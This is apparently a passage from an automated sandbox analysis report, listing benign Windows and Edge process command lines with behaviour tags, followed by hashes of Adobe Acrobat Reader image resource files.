C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:32⤵PID:1300
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:82⤵PID:3352
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:12⤵PID:1032
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:4384
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:8
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2264
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2244
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\GetMeasure.mhtml1⤵
- Modifies Internet Explorer settings
PID:1616
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2112 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe8b923cb8,0x7ffe8b923cc8,0x7ffe8b923cd82⤵PID:4996
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:22⤵PID:2692
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:32⤵PID:3288
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2512 /prefetch:82⤵PID:2748
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:12⤵PID:3568
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:12⤵PID:4172
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:12⤵PID:3736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:12⤵PID:676
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:82⤵PID:1452
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:12⤵PID:4604
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:12⤵PID:1828
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3012 /prefetch:82⤵PID:1372
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:12⤵PID:1900
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1592
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4700
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
PID:3728
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding1⤵PID:1572
-
C:\Program Files (x86)\Windows Media Player\setup_wm.exe"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding2⤵PID:4000
-
C:\Windows\SysWOW64\unregmp2.exe"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon2⤵PID:4584
-
C:\Windows\system32\unregmp2.exe"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
C:\Windows\system32\msinfo32.exe"C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\Desktop\DebugFind.nfo"1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: GetForegroundWindowSpam
PID:3264
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:996
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4652
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1748
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1368
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2264
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png
Filesize50KB
MD52bcd76e70e270f4d9b0404887ff9309c
SHA1657bafb280f78c8bbf2027d16f3e0f21595d9d0b
SHA256aff399fcdd6d2d5c9ad5672b28a2650f2d2d8966f7641cf8e1dd9f4ed7c9335e
SHA512864b80e8371e9b64fa71972d2ca54d8eb67a8abce6610699ea7d8482aa9b10fca1c3b470c77e651474c3600818acb99d09b1fd08590de69113a505a4c626969b
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions.png
Filesize1KB
MD59fdd3ea9132d1ba41e9dd26e23ebb047
SHA1242762baa21fa809798619b22415b1ecad9b7379
SHA2565158d24f88c9f2b4f736da89b067fa185ad5c9b709138ac5985ac45093d4c230
SHA51295338657100f45f24774ed3c178cc6ccc41fb8c99ac67b26d7091d3e59ceec2cad2987b21c05dc0e987e6f9c06890fb26de73d64a75d148788f8f74f6938e6a4
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions2x.png
Filesize3KB
MD53e1b9034fffb589e141fd92a8c5659da
SHA1d17b146c4bb8dc7c8e149c6f49df719decd88432
SHA256ccb2cd07c2934502fb09e58bf190c4286d6decb9702bb7547c86cfc396e0c4eb
SHA51241112c8ce7d0be04ecc8bde59f613d52342e0d76b121ed71afdd16a0176727867ab94402de4203a8b900e1fc949d887aff587f577a58d6cb1db502fbd25927bc
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons.png
Filesize688B
MD51b967d6db333e2c943deb96f683294d1
SHA14eb9732299c5cac83253b12db5c856a2377364f8
SHA2564d0b765ca0f5a1c81d73a8433c79eb2a2c50e80bab44794dfc50f443290e2d6b
SHA51207f59a8879b1c19b629b30d2ee6b3c996e89635d4c692a2eb8dfb6c135c879cacbf6284bc6376fcbdb6ac4c1782f75bf767cb6ba2b32342c3093e2a5b3fbbf5a
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons2x.png
Filesize1KB
MD573d2d111b055d4664b078b834f26ab2b
SHA16fb2b734767c75975a6bde9c45b6080f522c77c1
SHA2567d433dcbcdfa9b17978639e6c0be371f8474683f4b69542433da9ce7f29236aa
SHA512357127b51139795f0f63eb911d477cd6c128c79fd18f5a9a06bd8e030d3730260bd378354f00b51f8e8b3962989ef73af8befdaab3903346c95c3fdc765f1c6d
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png
Filesize448B
MD53312ec3e84757d9010bfcce334b17d00
SHA11f7bc53f87314ca45ff97a4bea4b94f56ffd2b37
SHA2569ad6e097e6c3475829e414b16996e4d0d56c55f448b8916479b7d51a8b1c2638
SHA512766785d3cac28e75bd5dcf717dc7c7e57f2cf87165c0fef295756eb71f1756d1bd1e9404e81cb2089e367e79cf11468b92e9bc737b6d67e8f25a27103a3ee425
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_2x.png
Filesize624B
MD572c74c73de45dcccacf48dadcca387f8
SHA14078866b700a805f9152ad125506f624470ede9a
SHA256e4cf6e2401558cd6b3b5389c551ba017eecfab630196b7817d76c4322236ac78
SHA512ce0ca668bd7c3a14d9742d4c53bce073022a8fbe288108cb0aa3d29daaaee5fc2a7fd3580aea841b1fd0d205b6477b2523d5ca939b65b82f18e3b077c946b723
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover.png
Filesize400B
MD5a5b4b6728b5dfe0eb2c3ef6261db251f
SHA147e20dcf055a4a093334727e4b2cfacf5439f239
SHA2564c2c6dfbd38a94c6a4d59dc3fa097ec87eedcdbca5fe70887e7112c4549cf8d5
SHA51284249676242f8dc2ed6a7d3994136a0c64f58ff8cad6630ed5db8bdf269ae6f9ce1f8bc9e27600971825617ff41b97e6da416f08c29fba16e8593a57b7f94821
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png
Filesize560B
MD506b44436b3589e8f4e5019b5ad051133
SHA1580377af4a40b3e9805790db8489208ff83bab36
SHA256f3226bc2e8cd94b5623b3408ba7d354da909ec83ac3774d87778e9ec26db0e36
SHA512aa4c6067d47b8478e8edcf69ae84b0d738a489ff17b02f1d32657cb8f43d66e829977fe43374f6a729debaa9dd234f7a7c1b322816cc78d016ce9aced3b6cbb8
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon.png
Filesize400B
MD560eab2d1abf9985f1e15650cb295aea5
SHA1cc008d49f277dd8b75ac92f0874bc4606c1a1c97
SHA25697bd7c426781ac5bf3ebe42c92c8fe0a235a048ff4243c52c09a9487c231d9ea
SHA5126cee9f61a42305659279930d35cba48bad20f637dea984f7b89a529334325f1ac86ddc9b16767914aae427ba878a8288f3465544cb2e5735b2ff3305028978fd
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png
Filesize560B
MD5f26089befa3c95edcfe6930f116b8b36
SHA164a92ee37f7cb6bc8e49126b9f5691d0b2c5a03a
SHA2562951403fb358391012da897fcd01d682744a989b1c9fdde85cedba5afefcc422
SHA512645657982067a108774832ba33202b827f18ef52477c960c7e65bdcced029d999a9b32fddb1b7ef63271c8e99409d33f69dd925d6758fecd4be0a8683c2b9fc4
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png
Filesize400B
MD5ca3ec706cf41d9cd19842a51f7399cee
SHA1dcd539f9d5d7d5adcdfd260e7c737c8c4887a385
SHA2569ad930f0d2d7b9ed12e9e8a189c9118432bd5daec67f8085aa6bf24fefd853d8
SHA51235617ab70869a2c1d4a63cb44b826ff0b1dc76f12d2318ec48a2ecd432df26731845d1b79337b421be32e9659d701dc5245ab9eab4fae3d0b27ae2b243f7ae29
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png
Filesize560B
MD5ac881fefa433aa39bea341e674da83ea
SHA14f2b04df946218d8b8c49bbd1de83a2d52ab137e
SHA25655eb0e991fff25994b0d15f7587d8b2b8d6c0b8ffc4afeafd2f556304df86012
SHA512f5e07154b243f0c0a6604d67dd418f31ddd4155092ebcb0afd6e1dd8b56184382d6b36a0e3b53dc59e987154746be22fd4dbf244251b6bea6ad3f9d7d629a359
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons.png
Filesize7KB
MD5f231d29de1d9859df794e14f96734cd0
SHA1f4b4c015524249419c1ea12022a8c3b4bde51676
SHA2568d1fdff98204874d8578d722f83e1db83c8ce99c0c808d0974f29f5360dd6d85
SHA51299388bd1a7717546c876dccd23e03f472280ceac2078d169ca181c3dda9fecc86f137037b462d9543664b8e45f7e90cd2c7e083e1c653420e1715b958bc3ec03
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_ie8.gif
Filesize7KB
MD590002005d0c5c99b18fa346250e6a416
SHA14511c3f13e23e6b5691e6d5c43aeee2034177f7b
SHA256d1782cf11ba8dec8c817666ef614a0571511cc13bd9f8eacc1d3233f25526d8d
SHA51243df4c010595d665d5fb6a1f4b173a0242ac849d36cb5089fa4081859c78df77c9a02cd92719a34b160053666f53e7a363e603048797b9e84254683046cb7695
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_retina.png
Filesize15KB
MD51527e7a50e10538a4792e02c73f280fe
SHA1faa8822d925bd36d361487861b9cd6e495b8387e
SHA256b47af3057bf73b96dd1cdd8d68a224c1c2555b711593e9b2d54b7615ef37a8c9
SHA512d9671bc7f30ff1c099162765c8f2527be8fd82fb940627b4f65f4537e0ca1bbcf1fd023bfb439293a210064f4217ee6ec45c2ead535b24dfd3ccdbb7815e188c
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png
Filesize8KB
MD5f6130ccc0d741f3df6330f91916b65c7
SHA17399ae5008015ed9b944083eef67cfc22948de74
SHA256d799fd16e4438a0054862e2920adf6434fb23f771e8f9f35d4c83b8705705aa9
SHA512c59e31b8437ebab6b90511ec298f6761263a0e74eb24edb272bf0e0443476045510e3ca9e267dfc656657ab1d0f9d4f974bc4a4f06c0247d5339a67e3f885087
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons_retina.png
Filesize17KB
MD5452e5accd9111e8e99e0f54c614ee65c
SHA14472d512e18a1ece1973e2c1a1bb005fc6df9fd5
SHA256a95db8758184ee3162bcb46095d131809cc8d6f6cfb4b17ee9fa656c82a74478
SHA5124ef31a368e2d99d6947b790eae0944d2d6ef7311a26077d1f0010589b08d843b63d241e9522ec0a4c7125b48f1b07af6ac9109a7f2d40d2d313e941986def4b6
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_pattern_RHP.png
Filesize192B
MD52425ec0786ab2b067ff129b5a0857f0e
SHA158d8fd90e1afe972706f605bbc42217fbe555b0c
SHA25658f64442aeb924cf589bf79ca6490fbe43da89f72fc6551ca6a2ca800e7e3498
SHA512bd684f9f903b101553246ad662d745cde6f7b6919d1636656b11c6dd9edd8cdc7da82f3007a42ef8029007a22fc17e21b69e6c93570fe24dc3cf72d0a07c9202
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_patterns_header.png
Filesize704B
MD57d119fd6b421b73e0c7bee830433426c
SHA1ea2ef907f366628b194449131a8c67b81abb2400
SHA256b9355170c1001eff1e47888e7c8c3b99881d3e1ef48ad83f920d500ea92c62b2
SHA512aeaaf374f2e4553d7ad31ac519f0f06c505ffdfbee0f899d19972205f5c773955734e98406c5ef536481eeb0a150e0c033106f47b13e0b913758471f0f5535b7
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\illustrations.png
Filesize8KB
MD50eee27830db5e0e423a790136bb356a2
SHA1e9f2649edcee84460347cd7f3c39738a69b7f15e
SHA25615206cb6fe8a57d88e2925d145629482e09248f89c8f782fad9bc2eb68cf6b63
SHA512b751afc7e53cdfaa6e3887699f28862b487dab6160fb97c3804ce715a13517f064a4e52905abe0a7a4f0fbcae6e44abd39ff2bfd45eb78818ca08baf1b5938b9
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\illustrations_retina.png
Filesize19KB
MD5b6f7a5151bf672cf650f13752a01210e
SHA11a19910e0b3aca48171e460b143aecb95be9f3c3
SHA25645c2844e56b9f51163a180d6aa28e3d3149113d0cc8e2b0a08ac22db555a4302
SHA5121fdcdd6fdc323fb383bacd4d88a9172bde07446788f7792e1d8b21f98fefc6c724ae1b57e26c9175570267754de9449e47fa755ceaf92793bedb13253cd3dfd0
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\progress.gif
Filesize19KB
MD5eb93024ea7e556688669550bcd6035be
SHA1cba1d40a762db06433c853a0bc1daebfef8759f4
SHA256884c2fa71d2c18ef957f6613547aa1c77fa719d11aa16b5ce424c53d449ef51a
SHA512df8c4aa265245673a36704c4d3fd3ef1136730c80c34b9e81d295649fbcfe8f73ba949cb5ac3221e31323127ef66a2bc338352cb1b0e3e7e71f1b7562403ec74
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\faf_icons.png
Filesize6KB
MD5e11b645de5e7687cd27d8a22b333f7df
SHA14202a57f7fff53568fb925915e6d86529c99c549
SHA256456bd4474e70fd9d8a3b27c66e69601405097cd091b72aeee0785272aa0b7d38
SHA5127662523bc50644d8a27581cb3f4ed68f276cf6d6e86711b626331754c2ca791e379de3dc3ed151f7fca3031b69b3b4065a03ea3d21e630d0bfcebac6cc9739a1
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\bun.png
Filesize2KB
MD503fd2ba1aefa821316c23fc0ad7a9948
SHA1129f4512945f5de98c6eb39e5d67fa92e7447b74
SHA256c663e4df263c4bc8ba8f0f85de449a9a22dde878a9726c33e292dbbd2ae9329e
SHA512a316157333dd51abf4f8090c6b71067c216e3ab2ddc7169d87cfaea4c8b6064f2e8c5e78b8bc66224fde4fb8d18821ceae409ef4db68088cbcc6230f4e551902
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview.png
Filesize2KB
MD56ad90c9249b4099d11f1dbe16662b631
SHA12184cdbe5f7383f4536c6d96709dc9b34f060220
SHA25661eb2331926e209e3b46570812e2e13ba5b39801918516997e84f4b59d3f1097
SHA5127a2fc7879a91f7430d9f1a2824b851d47297750469ee5870f1c233f1abeb47baae98472b7ad080e168ca130b9434c04bc0f66ae1f241ecb5d801a50281298278
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview2x.png
Filesize4KB
MD5b3251de34f891daf35d8bce7212fd763
SHA1c35dfd626a7ab88080a9e0e737c60562e7c9d13e
SHA25604f1e7d8b5945d7dda908ffb158076fa70190c05a40869a36e0e123266f1913c
SHA5128760d95081c4357103808f56f1eedf886c05c7fb13317002c67d8ad0268f1702a06cc9b32b3be081b7b6ea1b3310ac11911133cf1b5c6aba39ee02c2281b0d32
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\dd_arrow_small.png
Filesize304B
MD521b6993ed7f2ead473822750330ce61e
SHA13ce84fcb1f386bb57ade68b68901796d300c9d27
SHA2566acf60f4058b0bc525d42197107ca70d9db5c487b48d640848eccb5be7f1220d
SHA51200b1a439b62ae2271840ac585acc0b53560d3b2536bd34c94e3134e25159b58003401dd4e9d2a4e2188a19e4a50622fa6c2378f3f253905a14305d809dc9530d
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\dd_arrow_small2x.png
Filesize400B
MD570522f636bc66c7db879af8bc8c82283
SHA1a5f9e8b96585f04ba60d33b8b52fefd9a62a351e
SHA256b083444d286df6e2088cf7f66188c9e9c9892787feb0c976905ca6583c096a7c
SHA512eda05c8c38055a6c21e4c6cf514a57dd72a3d9c7b91a661ef5d384596a43686406a78496197741a5a4fb99076682a230b3581b48d72c8ebfc343446aa618dec3
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\illustrations.png
Filesize4KB
MD5880ca84f37eb2b3c7429c9ada236d093
SHA161a9f7d3e838bf537f55866a0f425dd814fffd9f
SHA256e227720df98cf4b09ab22f6c946e4abb2ca4fe2b4ef4726a8b741f2e4dbb20bb
SHA512cfe74b82c6d4c84630ce081d28ca17c75310f0d4c85249102cf178e6577b79efa6f9e30f3cbc4dc1f74b10a0b432a63ef74fadd8d90923c1e0cfe58271f211b9
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\nub.png
Filesize1008B
MD511c6679c44b5d47180867e5aa8c0eace
SHA145ba838c2ada43a0989fb7f316ef472a06aad2e0
SHA2560facd339e8eb387462b25e041d1d5189f281730e1c057799a2fe3b220ac983ea
SHA5128eca06f4d7237e5d712a72b6706c8424e4521a4b4c8ca7bdd529083e2ba37e7d8d142ac75289c4c0757eea48cd46abb5e5d12efc5a0227ce6a849d0009764ac2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\share_icons.png
Filesize1KB
MD548ed5aa8983106d1b5fdd4385c70818d
SHA15ba4d0e063da7434deea5e09531ee26abaa25563
SHA256b21e4fc191f105013402a157189492b429a6179d7086f34203fe43845fc5f9f1
SHA51282cf115cce86ca09972572ad5f666ff8ce11e6fc8fd23a034abd9e9c0c93972ff9997eac171de7d789daa43be95f69238499111a26446b8bcfe141281443461d
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\share_icons2x.png
Filesize2KB
MD5b855b4ad9029bdbbc622e0ea2b5a6486
SHA114d80c32dd1f8ee257f97760b01b1a0ff3f6ca1f
SHA256f618e5c6184ea99b65a0a17ae9233f85757c5cfe3816c6c952373dfcf49abda1
SHA51238bb55669207befa260b3da9e4855b8dbd69092dc0f967254c87a8dcb3f00c6ac9ae034fa13561caa0739684992f278fdecb2c80e43de17b9d719ed43095e734
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adc_logo.png
Filesize3KB
MD5b116160e02ea0cff0b16e0048cc4ff59
SHA185b2fa899aea566637ec22a9b8e3cd0241be2b2a
SHA256e595e932315e5c5a56685ef089ef5d486ed73626e0b5fa1a70370273ddb6f0ad
SHA512ccb16ac41b3c16e2212a29c0b1ab0beada709f68a78b8e2008a7addf3696bc1230fd4d9f6849113f4d7de86d431a795b19cb3ac2f6199d270858a21f4c8a4ee8
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif
Filesize560B
MD560b0e216f5beb47f02925b24bb0723fc
SHA107c47a05457b139df2e7c8bc6979628c24d91484
SHA2562234278e0cc3182556d84c5eace2242fa2cfc88b6fd81dda8a136dae59a2adac
